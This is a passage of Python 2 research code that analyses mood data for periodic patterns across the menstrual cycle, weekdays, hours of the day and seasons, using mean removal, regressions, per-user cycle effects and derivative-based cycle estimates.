data = deepcopy(results[emotion_pair][substratification][substratification_level][data_to_use])
data['date'] = data['date'].map(lambda x:x.split()[0]) # remove 00:00:00 at end
data = data.loc[(data['date'] >= min_date) & (data['date'] < max_date)]
print '%i dates in data between %s and %s' % (len(data), min_date, max_date)
data = data.loc[data['n_obs'] >= min_obs]
data.index = range(len(data))
print("After filtering for min_obs=%i, %i dates" % (min_obs, len(data)))
assert list(data['date']) == sorted(list(data['date'])) # make sure dates are in correct order, if not something is wrong.
# make sure dates are correctly formatted.
assert data['date'].map(lambda x:(len(x.split('-')[0]) == 4) and
(len(x.split('-')[1]) == 2) and
(len(x.split('-')[2].split()[0]) == 2)).all()
data['date'] = data['date'].map(lambda x:datetime.datetime.strptime(x, '%Y-%m-%d'))
data['mean'] = data['mean'] - data['mean'].mean()
if 'continuous' not in emotion_pair:
data['mean'] = data['mean'] * 100.
print("means are in units of percent!!")
## print out high and low dates.
if print_outlier_dates:
print 'Highest dates'
print data.sort_values(by='mean')[::-1].head(n=10)
print 'Lowest dates'
print data.sort_values(by='mean').head(n=10)
def moving_average(a, n=31) :
ret = np.cumsum(a, dtype=float)
ret[n:] = ret[n:] - ret[:-n]
return ret[n - 1:] / n
moving_average = (15 * [None]) + list(moving_average(data['mean'].values)) + (15 * [None])
data['rolling_average'] = moving_average
data['mean_minus_rolling_average'] = data['mean'] - data['rolling_average']
print 'Highest dates after removing rolling average'
print data.dropna(subset=['mean_minus_rolling_average']).sort_values(by='mean_minus_rolling_average')[::-1].head(n=10)
print 'Lowest after removing rolling average'
print data.dropna(subset=['mean_minus_rolling_average']).sort_values(by='mean_minus_rolling_average')[::-1].tail(n=10)
print 'Special dates'
for date in ['2016-01-01', '2016-02-14', '2016-11-09', '2016-12-25', '2017-01-01', '2017-02-14']:
print date
print data.loc[data['date'] == date]
# check for a time-trend (which could complicate analysis)
# this is actually slightly off because it assumes we have data for every single day, and that's not quite true.
# but we're only missing ~4 days so it should be okay.
slope, intercept, r_value, p_value, std_err = linregress(range(len(data)), data['mean'])
increase_per_year_in_percent = slope * 365
sorted_data = data.sort_values(by='mean')
min_val_string = 'Minimum value is %2.1f%%, occurring on %s' % (sorted_data['mean'].iloc[0],
sorted_data['date'].iloc[0])
slope_string = 'Linear trend: increase per year %2.1f%%, r^2 %2.3f' % (increase_per_year_in_percent, r_value**2)
if data_to_use == 'means_by_date':
individual_mean_string = "individual mean NOT removed"
else:
individual_mean_string = "individual mean removed"
fig = plt.figure(figsize=[24, 5])
if period_effects_vector is None:
plt.plot_date(data['date'], data['mean'], '-', label='Currently observed signal', color='black', linewidth=3)
else:
data['days_since_beginning'] = data['date'].map(lambda x:(x - data['date'].min()).days)
data['period_effect'] = data['days_since_beginning'].map(lambda x:period_effects_vector[x % len(period_effects_vector)])
data['counterfactual_signal'] = data['mean'] + data['period_effect']
plt.plot_date(data['date'], data['counterfactual_signal'], '-', label='If menstrual effect were observed', color=PERIOD_CYCLE_COLOR, linewidth=3)
plt.plot_date(data['date'], data['mean'], '-', label='Currently observed signal', color='black', linewidth=3)
if plot_the_weekend:
data['is_weekend'] = data['date'].map(lambda x:x.strftime('%A') in ['Saturday', 'Sunday'])
plt.plot_date(data['date'].loc[data['is_weekend']],
data['mean'].loc[data['is_weekend']],
label='',
color='black')
#for year in [2016, 2017]:
# plt.plot_date([datetime.datetime(year, 1, 1), datetime.datetime(year, 1, 1)], [-ylimit, ylimit], '-', color='black')
outliers_to_nice_names = {'2016-11-09':'Day after 2016 US Election',
'2016-12-25':'Christmas',
'2015-12-25':None,
'2017-06-25':'Eid al-Fitr, Saudi Arabia',
'2017-02-11':'Chinese New Year Lantern Festival',
'2017-10-12':'Lady of Aparecida Day',
'2017-09-07':'Brazilian Independence',
'2016-10-12':None}
outliers_to_colors = {'2016-11-09':'#9467bd',
'2016-12-25':'#2ca02c',
'2015-12-25':'#2ca02c',
'2017-06-25':'#2ca02c',
'2017-02-11':'#2ca02c',
'2017-10-12':'#2ca02c',
'2017-09-07':'#2ca02c',
'2016-10-12':'#2ca02c'}
warning_string =''
if outliers_to_highlight is not None:
for outlier in outliers_to_highlight:
assert outlier in outliers_to_nice_names
outlier_idxs = data['date'] == datetime.datetime(*[int(a) for a in outlier.split('-')])
assert outlier_idxs.sum() == 1
val_to_plot = float(data['mean'].loc[outlier_idxs].iloc[0])
most_extreme_val_to_plot = ylimit * .95
if val_to_plot < -most_extreme_val_to_plot:
val_to_plot = -most_extreme_val_to_plot
warning_string += '\nWARNING: EXTREME VALUE %s has been truncated' % outlier
elif val_to_plot > most_extreme_val_to_plot:
val_to_plot = most_extreme_val_to_plot
warning_string += '\nWARNING: EXTREME VALUE %s has been truncated' % outlier
plt.plot_date(data['date'].loc[outlier_idxs],
[val_to_plot],
color=outliers_to_colors[outlier],
label=outliers_to_nice_names[outlier],
markersize=13)
#plt.plot_date([data['date'].loc[outlier_idxs].values[0],
# data['date'].loc[outlier_idxs].values[0]],
## [-ylimit, ylimit],
# color=outliers_to_colors[outlier],
# label=outliers_to_nice_names[outlier],
# linestyle='--')
plt.title('%s\n%s\n%s\n%s\nsubstratification: %s, val: %s%s\n' % (emotion_pair,
min_val_string,
slope_string,
individual_mean_string,
substratification,
substratification_level,
warning_string))
plt.legend(prop={'size':20}, bbox_transform=fig.transFigure, bbox_to_anchor=(.68, .7)) #'weight':'bold'
plt.subplots_adjust(right=.68)
#plt.legend(prop={'size':18, 'weight':'bold'})
assert ylimit > 0
plt.ylim([-ylimit, ylimit])
plt.xlim([data['date'].min(), data['date'].max()])
#plt.plot_date([data['date'].min(), data['date'].max()], [0, 0], linestyle='--', color='grey')
good_symptom, bad_symptom = emotion_pair.split('_versus_')
good_symptom = good_symptom.split('*')[1]
bad_symptom = bad_symptom.split('*')[1]
if 'continuous' not in emotion_pair:
assert ylimit % 2 == 0
plt.yticks([-ylimit / 2, 0, ylimit / 2],
['%i%% more %s' % (ylimit / 2, bad_symptom),
'Baseline',
'%i%% more %s' % (ylimit / 2, good_symptom)],
fontsize=22)
date_ticks = [datetime.datetime(2016, 1, 1),
datetime.datetime(2016, 4, 1),
datetime.datetime(2016, 7, 1),
datetime.datetime(2016, 10, 1),
datetime.datetime(2017, 1, 1),
datetime.datetime(2017, 4, 1),
datetime.datetime(2017, 7, 1),
datetime.datetime(2017, 10, 1)]
date_ticks = [tick for tick in date_ticks if tick >= data['date'].min() and tick <= data['date'].max()]
plt.xticks(date_ticks, [x.strftime('%Y-%m') for x in date_ticks], fontsize=22)
if figname is not None:
plt.savefig(figname, dpi=300)
plt.show()
def add_binary_annotations(d, start_day_for_period_individual_effect, end_day_for_period_individual_effect):
# Checked.
assert start_day_for_period_individual_effect is not None
assert end_day_for_period_individual_effect is not None
d['weekend'] = d['weekday'].map(lambda x:x in ['Saturday', 'Sunday'])
d['summer'] = d['month'].map(lambda x:get_season(x) == 'summer')
d['winter'] = d['month'].map(lambda x:get_season(x) == 'winter')
d['near_period'] = d['date_relative_to_period'].map(lambda x:(x >= start_day_for_period_individual_effect) and
(x < end_day_for_period_individual_effect))
d['middle_of_night'] = d['local_hour'].map(in_middle_of_night)
return d
def remove_individual_means_from_df(d):
"""
Checked. For each individual, removes their mean value, consistent with Golder + Macy Science paper.
"""
d = deepcopy(d)
individual_means = d[['user_id_hash', 'good_mood']].groupby('user_id_hash').mean()
individual_means = dict(zip(individual_means.index, individual_means['good_mood']))
d['individual_mean'] = d['user_id_hash'].map(lambda x:individual_means[x])
d['good_mood'] = d['good_mood'] - d['individual_mean']
assert abs(d[['user_id_hash', 'good_mood']].groupby('user_id_hash').mean()).values.max() < 1e-8
return d
def compute_means_by_date(d, remove_individual_means):
"""
Checked.
Returns a dataframe with the fraction of people who report positive emotion on each date
along with the number of observations on that date.
"""
d = deepcopy(d)
if remove_individual_means:
d = remove_individual_means_from_df(d)
means_by_date = d[['good_mood', 'date']].groupby('date').agg(['mean', 'size'])
# Reformat data so it doesn't have a weird multi-index and make sure it's in sorted order.
means_by_date.columns = ['mean', 'n_obs']
means_by_date['date'] = means_by_date.index
del means_by_date.index.name
means_by_date = means_by_date.sort_values(by='date')
means_by_date.index = range(len(means_by_date))
return means_by_date
def compute_diffs_in_binary_variable(d, remove_individual_means, start_day_for_period_individual_effect, end_day_for_period_individual_effect):
"""
prints the differences in a binary variable between weekend and weekday, summer and winter, and period / not period.
Checked.
"""
d = deepcopy(d)
d = add_binary_annotations(d, start_day_for_period_individual_effect, end_day_for_period_individual_effect)
if remove_individual_means:
d = remove_individual_means_from_df(d)
results = {}
for time_period in ['summer', 'winter', 'weekend', 'middle_of_night', 'near_period']:
results['%s_mean' % time_period] = d['good_mood'].loc[d[time_period] == 1].mean()
results['not_%s_mean' % time_period] = d['good_mood'].loc[d[time_period] == 0].mean()
results['n'] = len(d)
return results
def take_simple_means_by_group(d, remove_individual_means):
"""
rather than doing a regression or anything fancy, just does a groupby to get counts and means for each group.
Checked.
"""
d = deepcopy(d)
if remove_individual_means:
d = remove_individual_means_from_df(d)
results = {}
for grouping_variable in ['month', 'weekday', 'local_hour', 'date_relative_to_period']:
summary_stats = ['mean', 'size', 'std']
grouped_d = d[[grouping_variable, 'good_mood']].groupby(grouping_variable).agg(summary_stats)
grouped_d.columns = summary_stats
grouped_d['err'] = 1.96 * grouped_d['std']/np.sqrt(grouped_d['size'])
grouped_d = grouped_d[['mean', 'size', 'err']]
results[grouping_variable] = grouped_d
return results
def find_interaction_between_cycles(d, remove_individual_means, start_day_for_period_individual_effect, end_day_for_period_individual_effect):
"""
assesses whether there are interactions between cycles (not user-specific). Checked.
"""
results = {'linear_regression':{},
'raw_means':{}}
print "assessing non-user-specific interaction between cycles"
d = deepcopy(d)
d = add_binary_annotations(d, start_day_for_period_individual_effect, end_day_for_period_individual_effect)
d['good_mood'] = 1.0 * d['good_mood']
if remove_individual_means:
d = remove_individual_means_from_df(d)
boolean_cols = ['near_period', 'middle_of_night', 'weekend', 'summer', 'winter']
for i in range(len(boolean_cols)):
for j in range(i):
if boolean_cols[i] == 'winter' and boolean_cols[j] == 'summer':
# singular matrix (these are mutually exclusive)
continue
key = '%s*%s' % (boolean_cols[i], boolean_cols[j])
raw_means = d[['good_mood', boolean_cols[i], boolean_cols[j]]].groupby([boolean_cols[i], boolean_cols[j]]).mean()
print 'results for', key
print raw_means
model = sm.OLS.from_formula('good_mood ~ %s*%s' % (boolean_cols[i], boolean_cols[j]), data = d).fit()
print model.summary()
results['linear_regression'][key] = {'pvalues':model.pvalues, 'betas':model.params}
results['raw_means'][key] = raw_means
return results
def compute_individual_level_cycle_effects(d, start_day_for_period_individual_effect, end_day_for_period_individual_effect):
"""
compute the individual cycle effects by person. Checked
Does not remove the mean for each individual prior to computing individual cycle-level effects (but this shouldn't matter).
"""
raise Exception("This is deprecated!")
print("Computing individual-level cycle effects.")
boolean_cols = ['near_period', 'middle_of_night', 'weekend', 'summer', 'winter']
d = deepcopy(d)
d = add_binary_annotations(d, start_day_for_period_individual_effect, end_day_for_period_individual_effect)
grouped_d = d.groupby('user_id_hash')
print("Done grouping data")
# results data format is a little odd here. one list entry for each user.
# each list entry is a dictionary: keys are number of observations and cycle effects.
results = []
total_users = len(set(d['user_id_hash']))
n_users_examined = 0
for user, user_d in grouped_d:
n_users_examined += 1
user_results = {}
n = len(user_d)
user_results['n_obs'] = n
user_results['user_mean'] = user_d['good_mood'].mean()
for boolean_col in boolean_cols:
n_in_cycle = user_d[boolean_col].sum()
if (n_in_cycle == 0) or (n_in_cycle == n):
cycle_effect = np.nan
else:
cycle_effect = user_d.loc[user_d[boolean_col] == True, 'good_mood'].mean() - \
user_d.loc[user_d[boolean_col] == False, 'good_mood'].mean()
assert ~np.isnan(cycle_effect)
user_results[boolean_col + '_n_obs'] = n_in_cycle
user_results[boolean_col + '_cycle_effect'] = cycle_effect
for covariate_col in COLS_TO_STRATIFY_BY:
user_col_vals = list(set(user_d[covariate_col].dropna()))
if len(user_col_vals) != 1:
user_results[covariate_col] = None
else:
user_results[covariate_col] = user_col_vals[0]
results.append(user_results)
if len(results) % 10000 == 0:
print '%i / %i users examined' % (len(results), total_users)
results_dataframe = pd.DataFrame(results)
for c in results_dataframe.columns:
print 'Column %s has %2.3f%% good values' % (c, 100.*len(results_dataframe[c].dropna()) / len(results_dataframe))
return results
def fast_compute_individual_level_cycle_effects(d, start_day_for_period_individual_effect, end_day_for_period_individual_effect):
"""
Computes individual-level cycle effects using a group_by as opposed to being really really slow.
Checked.
"""
print("********")
print("Computing individual level cycle effects QUICKLY for %i rows and %i users" % (len(d),
len(set(d['user_id_hash']))))
boolean_cols = ['near_period', 'middle_of_night', 'weekend', 'summer', 'winter']
d = deepcopy(d)
d = add_binary_annotations(d, start_day_for_period_individual_effect, end_day_for_period_individual_effect)
overall_means = d[['user_id_hash', 'good_mood']].groupby('user_id_hash').agg(['mean', 'size'])
overall_means = overall_means.reset_index()
overall_means.columns = ['user_id_hash', 'user_mean', 'n_obs']
for c in boolean_cols:
print(c)
on_cycle_means = d.loc[d[c] == True, ['user_id_hash', 'good_mood']].groupby('user_id_hash').mean()
on_cycle_means = dict(zip(on_cycle_means.index, on_cycle_means['good_mood']))
on_cycle_counts = d.loc[d[c] == True, ['user_id_hash']].groupby('user_id_hash').size()
on_cycle_counts = dict(zip(on_cycle_counts.index, on_cycle_counts.values))
off_cycle_means = d.loc[d[c] == False, ['user_id_hash', 'good_mood']].groupby('user_id_hash').mean()
off_cycle_means = dict(zip(off_cycle_means.index, off_cycle_means['good_mood']))
for k in overall_means['user_id_hash']:
if k not in on_cycle_means:
on_cycle_means[k] = np.nan
if k not in off_cycle_means:
off_cycle_means[k] = np.nan
if k not in on_cycle_counts:
on_cycle_counts[k] = 0
overall_means['%s_cycle_effect' % c] = overall_means['user_id_hash'].map(lambda x:on_cycle_means[x] -
off_cycle_means[x])
overall_means['%s_n_obs' % c] = overall_means['user_id_hash'].map(lambda x:on_cycle_counts[x])
return overall_means
def compute_individual_level_cycle_effects_for_period_by_splitting_into_two_and_taking_median(d):
"""
Used for computing period effects: dichotomizes at a cutoff day for each user
which maximizes the difference between pre and post
Checked.
"""
d = deepcopy(d)
print("Computing individual-level effects using median method")
grouped_d = d.groupby('user_id_hash')
print("Done grouping data")
results = []
n_users = len(set(d['user_id_hash']))
n_analyzed = 0
total_users_without_cutoffs = 0
for user, user_d in grouped_d:
user_d = deepcopy(user_d).dropna(subset=['days_after_last_cycle_start'])
if n_analyzed % 100 == 0:
print("Computed effects for %i/%i users" % (n_analyzed, n_users))
n_analyzed += 1
user_d = user_d.sort_values(by='date')
assert (user_d['days_after_last_cycle_start'] >= 0).all()
possible_cutoff_days = range(7, 22)
max_diff = 0
no_valid_cutoffs_found = True
for cutoff_day in possible_cutoff_days:
pre_cutoff_vals = user_d.loc[user_d['days_after_last_cycle_start'] <= cutoff_day, 'good_mood'].values
post_cutoff_vals = user_d.loc[user_d['days_after_last_cycle_start'] > cutoff_day, 'good_mood'].values
if len(pre_cutoff_vals) < 10 or len(post_cutoff_vals) < 10:
continue
diff = np.median(post_cutoff_vals) - np.median(pre_cutoff_vals)
if np.abs(diff) >= np.abs(max_diff):
no_valid_cutoffs_found = False
max_diff = diff
max_day = cutoff_day
total_users_without_cutoffs += no_valid_cutoffs_found
if no_valid_cutoffs_found:
print("Median effect could not be computed for this user:")
print user_d[['days_after_last_cycle_start', 'good_mood']].to_string()
continue
results.append({'user_id_hash':user,
'period_cycle_effect':max_diff,
'n_obs':len(user_d),
'user_mean':user_d['good_mood'].mean(),
'cutoff_day':max_day})
print("Total users without valid cutoffs (for whom no median effect could be computed: %i" % total_users_without_cutoffs)
return results
def find_person_specific_interactions_between_cycles(d, min_n = 20, min_in_group = 3, start_day_for_period_individual_effect=None, end_day_for_period_individual_effect=None):
"""
Looks for correlations between cycle strength across people: eg, do people with larger PMS
swings have larger midnight swings?
Do not need to remove individual mean because we are comparing individuals to themselves anyway.
Checked.
"""
boolean_cols = ['near_period', 'middle_of_night', 'weekend', 'summer', 'winter']
d = deepcopy(d)
d = add_binary_annotations(d, start_day_for_period_individual_effect, end_day_for_period_individual_effect)
grouped_d = deepcopy(d).groupby('user_id_hash')
results = {}
for i in range(len(boolean_cols)):
for j in range(i):
key = '%s*%s' % (boolean_cols[i], boolean_cols[j])
cycle_i_effects = []
cycle_j_effects = []
if boolean_cols[i] == 'winter' and boolean_cols[j] == 'summer':
# singular matrix (these are mutually exclusive)
continue
for user, user_d in grouped_d:
n = len(user_d)
# identify number of observations we have for each cycle.
i_true = user_d[boolean_cols[i]].sum()
j_true = user_d[boolean_cols[j]].sum()
# skip people who don't have enough good data (total count or count in each cycle group)
if n < min_n:
continue
if (i_true < min_in_group) or (n - i_true < min_in_group):
continue
if (j_true < min_in_group) or (n - j_true < min_in_group):
continue
cycle_i_effect = user_d.loc[user_d[boolean_cols[i]] == True, 'good_mood'].mean() - user_d.loc[user_d[boolean_cols[i]] == False, 'good_mood'].mean()
cycle_j_effect = user_d.loc[user_d[boolean_cols[j]] == True, 'good_mood'].mean() - user_d.loc[user_d[boolean_cols[j]] == False, 'good_mood'].mean()
cycle_i_effects.append(cycle_i_effect)
cycle_j_effects.append(cycle_j_effect)
r, p = pearsonr(cycle_i_effects, cycle_j_effects)
print '%s mean: %2.3f; %s mean %2.3f; correlation %2.3f; p %2.3e, n = %i' % (boolean_cols[i], \
np.mean(cycle_i_effects), \
boolean_cols[j], \
np.mean(cycle_j_effects), \
r, p, \
len(cycle_i_effects))
results[key] = {'mu_1':np.mean(cycle_i_effects), \
'mu_2':np.mean(cycle_j_effects), \
'r':r, \
'p':p, \
'n':len(cycle_i_effects), \
'full_effects_1':cycle_i_effects, \
'full_effects_2':cycle_j_effects}
return results
def compute_most_likely_derivatives(user_data, max_timestep):
"""
Given user data (a list of dictionaries with 'y' and 't' for each user)
and a maximum timestep, returns estimates of the derivatives.
Checked. Works on a bunch of simulated datasets.
Minimizes a least-squares objective ||A*delta - (y1 - y0)||^2 where A is a design matrix
delta is the vector of discrete derivatives we're solving for
and (y1 - y0) is the change in y.
"""
user_data = deepcopy(user_data)
user_data = [a for a in user_data if len(a['y']) >= 2] # can only use data with at least two timepoints.
total_datapoints = sum([len(user_data_i['y']) for user_data_i in user_data]) # number of rows in A matrix.
# the jth column corresponds to delta_j, ie, the derivative from t_j to t_j + 1, starting at j=0.
# If j = max_timestep, this is derivative from t_max_timestep to 0 (ie, loop back around).
A = np.zeros([total_datapoints, max_timestep + 1])
print 'Shape of original user data is', A.shape
row_idx = 0
y1_minus_y0 = [] # this is the target we're trying to hit: the change in y.
# Each entry is the user's value at the end of the time period minus their value at the beginning.
loop_around_rows = [] # these rows correspond to looping back and completing the cycle. Each user has one row.
# Not sure we want to include these rows in the computation. Including yields similar but non-identical results
# for noisy data (for perfect data, results are identical). We return computations performed both ways.
all_unique_timesteps = set()
for i in range(len(user_data)):
y_i = np.array(user_data[i]['y'])
t_i = np.array(user_data[i]['t'])
for t_ij in t_i:
all_unique_timesteps.add(t_ij)
assert len(y_i) == len(t_i) # timestamps should be equal in length to observations
assert len(set(t_i)) == len(t_i) # timestamps should be unique.
user_start_row = row_idx
for j in range(len(y_i) - 1): # -1 because we compare each timestep to the next timestep.
col_start_idx = t_i[j]
col_stop_idx = t_i[j + 1]
assert col_stop_idx > col_start_idx # timesteps should be in sorted order.
A[row_idx, col_start_idx:col_stop_idx] = 1
y1_minus_y0.append(y_i[j + 1] - y_i[j])
row_idx += 1
loop_around_rows.append(False)
# add loop around row, one for each user.
A[row_idx, t_i[-1]:] = 1
A[row_idx, :t_i[0]] = 1
assert A[user_start_row:(row_idx + 1), :].sum() == (max_timestep + 1) # each user should have exactly this many nonzero entries.
y1_minus_y0.append(y_i[0] - y_i[-1])
loop_around_rows.append(True)
row_idx += 1
assert set(all_unique_timesteps) == set(range(max_timestep + 1)) # we should have observations for every timestep.
assert (A.sum(axis=1) > 0).all() # all rows of A should be nonzero.
assert set(A.sum(axis=0)) == set([len(user_data)]) # all columns of A should add up to the number of users.
assert len(A) == len(y1_minus_y0) # make sure shapes are correct.
assert len(loop_around_rows) == len(y1_minus_y0)
loop_around_rows = np.array(loop_around_rows)
y1_minus_y0 = np.atleast_2d(np.array(y1_minus_y0)).transpose()
beta_with_looparound_rows, _, _, _ = np.linalg.lstsq(A, y1_minus_y0)
beta_without_looparound_rows, _, _, _ = np.linalg.lstsq(A[~loop_around_rows, :], y1_minus_y0[~loop_around_rows])
# remove looparound entry since we wouldn't use it anyway
beta_with_looparound_rows = beta_with_looparound_rows[:-1]
beta_without_looparound_rows = beta_without_looparound_rows[:-1]
print 'absolute difference in derivative estimates'
print np.abs(beta_with_looparound_rows - beta_without_looparound_rows)
return beta_with_looparound_rows, beta_without_looparound_rows
def do_derivative_estimation_on_real_data(d, cycle_column):
"""
runs the above method (which is designed for general, abstract data) on real data.
Checked.
"""
assert cycle_column in ['local_hour', 'weekday', 'date_relative_to_period', 'month']
n_unique_users = len(set(d['user_id_hash']))
user_data = []
d = deepcopy(d)
if cycle_column == 'weekday':
weekdays = ['Monday', 'Tuesday', 'Wednesday', 'Thursday', 'Friday', 'Saturday', 'Sunday']
weekdays_to_numbers = dict(zip(weekdays, range(len(weekdays))))
d['numeric_weekday'] = d['weekday'].map(lambda x:weekdays_to_numbers[x])
cycle_column = 'numeric_weekday'
cycle_start = d[cycle_column].min()
cycle_end = d[cycle_column].max()
all_cycle_vals = sorted(list(set(d[cycle_column])))
assert np.isnan(d[cycle_column]).sum() == 0
if cycle_column == 'local_hour':
assert (cycle_start == 0) and (cycle_end == 23)
assert all_cycle_vals == range(24)
elif cycle_column == 'weekday':
assert (cycle_start == 0) and (cycle_end == 6)
assert all_cycle_vals == range(7)
elif cycle_column == 'date_relative_to_period':
# two different filters might potentially be used.
assert (cycle_start == -14 and cycle_end == 14) or (cycle_start == -20 and cycle_end == 20)
assert (all_cycle_vals == range(-14, 15)) or (all_cycle_vals == range(-20, 21))
elif cycle_column == 'month':
assert (cycle_start == 1) and (cycle_end == 12)
assert (all_cycle_vals == range(1, 13))
print 'Original data for cycle %s ranges from %i to %i' % (cycle_column, cycle_start, cycle_end)
d['cycle_timestep'] = d[cycle_column].map(lambda x:int(x - cycle_start))
min_timestep = d['cycle_timestep'].min()
max_timestep = d['cycle_timestep'].max()
print 'New cycle timestep range is %i to %i' % (min_timestep, max_timestep)
grouped_by_user = d[['user_id_hash', 'cycle_timestep', 'good_mood']].groupby(['user_id_hash'])
n_users_read = 0
for user_id, user_d in grouped_by_user:
means_by_user_and_cycle_timestep = user_d.groupby('cycle_timestep').mean() * 1.0
user_data.append({'t':list(means_by_user_and_cycle_timestep.index),
'y':list(means_by_user_and_cycle_timestep['good_mood'].values)})
n_users_read += 1
if n_users_read % 10000 == 0:
print '%i / %i users read' % (n_users_read, n_unique_users)
derivative_with_looparound, derivative_without_looparound = compute_most_likely_derivatives(
user_data=user_data,
max_timestep=max_timestep)
def get_function_from_derivative(derivative_vector):
"""
small helper method to integrate a derivative. Starts at 0, adds the derivative at each timestep.
Y will end up being 1 longer than the derivative vector, which makes sense. So eg if max_timestep=3,
the derivative will have 3 entries (delta_0, delta_1, delta_2) and Y will have 4 (Y_0, Y_1, Y_2, Y_3).
Checked.
"""
y = [0]
for i in range(len(derivative_vector)):
y0 = y[-1]
y.append(derivative_vector[i] + y0)
y = np.array(y)
y = y - np.mean(y)
return y
looparound_estimated_cycle_values = get_function_from_derivative(derivative_with_looparound)
no_looparound_estimated_cycle_values = get_function_from_derivative(derivative_without_looparound)
if cycle_column != 'numeric_weekday':
true_cycle_timesteps = all_cycle_vals
else:
true_cycle_timesteps = weekdays
# put data into format for four cycle plots.
looparound_df = pd.DataFrame({'mean':looparound_estimated_cycle_values, 'size':1e12,'std':0,'err':0, 'looparound':True})
looparound_df.index = true_cycle_timesteps
no_looparound_df = pd.DataFrame({'mean':no_looparound_estimated_cycle_values, 'size':1e12,'std':0,'err':0, 'looparound':False})
no_looparound_df.index = true_cycle_timesteps
return looparound_df, no_looparound_df
def estimate_derivatives_for_all_four_types_of_cycles(d):
"""
Loops over all four types of cycles and computes derivatives for each. Checked.
"""
print 'Estimating derivatives for all four types of cycles'
d = deepcopy(d)
looparound_results = {}
no_looparound_results = {}
print 'Computing derivatives for period with 14-day span'
looparound_results['date_relative_to_period'], no_looparound_results['date_relative_to_period'] = do_derivative_estimation_on_real_data(
d.loc[d['date_relative_to_period'].map(lambda x:np.abs(x) <= 14)],
cycle_column = 'date_relative_to_period')
print 'Computing derivatives for period with 20-day span'
looparound_results['period_20'], no_looparound_results['period_20'] = do_derivative_estimation_on_real_data(d, cycle_column = 'date_relative_to_period')
for cycle_column in ['weekday', 'month', 'local_hour']:
print 'Computing derivatives for %s' % cycle_column
looparound_results[cycle_column], no_looparound_results[cycle_column] = do_derivative_estimation_on_real_data(d,cycle_column = cycle_column)
return looparound_results, no_looparound_results
def fit_linear_regression(d, covariates_for_regression):
"""
checked. Performs a linear regression on day of year, weekday, and period date.
does this after removing individual means. This regression is NOT analogous to the logistic regression below.
"""
for c in covariates_for_regression:
if c != 'days_since_start':
assert c[:2] == 'C('
if c == 'C(date_relative_to_period)':
raise Exception("This is deprecated; you want to set the base level as 0. Correct covariate is C(date_relative_to_period, Treatment(reference=0))")
t0 = time.time()
print("Performing linear regression. First removing individual means.")
d = deepcopy(d)
d['year'] = d['date'].map(lambda x:x.split('-')[0])
assert d['year'].map(lambda x:x in ['2015', '2016', '2017']).all()
d = remove_individual_means_from_df(d)
d = d.dropna(subset=[a.replace(')', '').replace('C(', '').split(', Treatment')[0] for a in covariates_for_regression])
model = sm.OLS.from_formula('good_mood ~ %s' % ('+'.join(covariates_for_regression)), data = d).fit(cov_type='cluster', cov_kwds={'groups':d['user_id_hash']})
print model.summary()
model_results = {'params':model.params, 'pvalues':model.pvalues, '95_CI':model.conf_int(), 'covariance_matrix':model.cov_params()}
print "Total time to perform linear regression: %2.3f seconds" % (time.time() - t0)
return model_results
def replace_elem_in_list(l, old, new):
new_l = []
assert new not in l
for i in range(len(l)):
if l[i] == old:
new_l.append(new)
else:
new_l.append(l[i])
return new_l
def fit_regression_with_alternate_period_specifications(d, covariates_for_regression):
# add extra column for how far someone is through their cycle.
print("Computing alternate period regression specifications")
print("Original covariates were")
print(covariates_for_regression)
d = deepcopy(d)
print d[['mean_cycle_length']].describe()
assert (d['mean_cycle_length'] < 7).sum() == 0
d['frac_through_cycle'] = d['date_relative_to_period'] / d['mean_cycle_length'].map(lambda x:x if x is not None else 1)
d.loc[pd.isnull(d['mean_cycle_length']), 'frac_through_cycle'] = None
d['frac_through_cycle'] = d['frac_through_cycle'].map(lambda x:math.floor(x * 28) / 28.)
d.loc[d['frac_through_cycle'].map(lambda x:np.abs(x) > .5), 'frac_through_cycle'] = None
print("Fraction of binned_frac cycle set to None: %2.3f" % np.mean(pd.isnull(d['frac_through_cycle'])))
val_counts = Counter(d['frac_through_cycle'].dropna())
assert len(val_counts) == 29
for val in sorted(val_counts.keys())[::-1]:
print("%s: %2.1f%% of non-missing values (%i)" % (val, 100.*val_counts[val]/len(d['frac_through_cycle'].dropna()), val_counts[val]))
# actually fit regressions
results = {}
for alternate_specification in ['days_after_last_cycle_start', 'days_before_next_cycle_start', 'frac_through_cycle']:
if alternate_specification == 'days_after_last_cycle_start':
alternate_specification_and_ref_level = 'C(days_after_last_cycle_start, Treatment(reference=0))'
elif alternate_specification == 'days_before_next_cycle_start':
alternate_specification_and_ref_level = 'C(days_before_next_cycle_start, Treatment(reference=-40))'
else:
alternate_specification_and_ref_level = 'C(frac_through_cycle, Treatment(reference=-0.5))'
results['with_period_parameterization_%s' % alternate_specification] = fit_linear_regression(d,
replace_elem_in_list(covariates_for_regression,
'C(date_relative_to_period, Treatment(reference=0))',
alternate_specification_and_ref_level))
return results
def fit_regression_with_alternate_seasonal_specifications(d, covariates_for_regression):
# Add some extra columns.
print("Computing alternate seasonal regression specifications")
print("Original covariates were")
print(covariates_for_regression)
d = deepcopy(d)
d['datetime'] = d['date'].map(lambda x:datetime.datetime.strptime(x, '%Y-%m-%d'))
# annotate with a grouped variable based on day of year. Eg, if bandwidth = 7
# this roughly corresponds to week of year.
def get_day_grouping(x, bandwidth):
day_of_year = int(x.strftime('%j'))
grouping = int(math.floor(1.*day_of_year / bandwidth))
return grouping
d['week_of_year'] = d['datetime'].map(lambda x:get_day_grouping(x, 7))
max_week_val = d['week_of_year'].max()
# keep from having super-short weeks
d.loc[d['week_of_year'] == max_week_val, 'week_of_year'] = max_week_val - 1
print("Week of year ranges from %i-%i" % (d['week_of_year'].min(), d['week_of_year'].max()))
# annotate with start date so we can fit a linear trend.
start_date = d['datetime'].min()
d['days_since_start'] = d['datetime'].map(lambda x:(x - start_date).days)
assert (d['days_since_start'] >= 0).all()
print("Days since start ranges from %i-%i" % (d['days_since_start'].min(), d['days_since_start'].max()))
# actually fit regressions
results = {}
results['with_week_of_year_instead_of_month'] = fit_linear_regression(d,
replace_elem_in_list(covariates_for_regression, 'C(month)', 'C(week_of_year)'))
results['with_days_since_start_instead_of_year'] = fit_linear_regression(d,
replace_elem_in_list(covariates_for_regression, 'C(year)', 'days_since_start'))
results['swap_out_both'] = fit_linear_regression(d,
replace_elem_in_list(
replace_elem_in_list(covariates_for_regression, 'C(year)', 'days_since_start'),
'C(month)', 'C(week_of_year)'))
return results
def bootstrapped_analyses_one_process(d,
bootstrap_regression_amplitude_errorbars,
bootstrap_regressions_of_period_effects,
bootstrap_daily_time_series,
regression_amplitude_kwargs,
period_effects_kwargs,
bootstrap_seeds,
return_dict):
"""
Parallelize bootstrapping - this is single-process helper method.
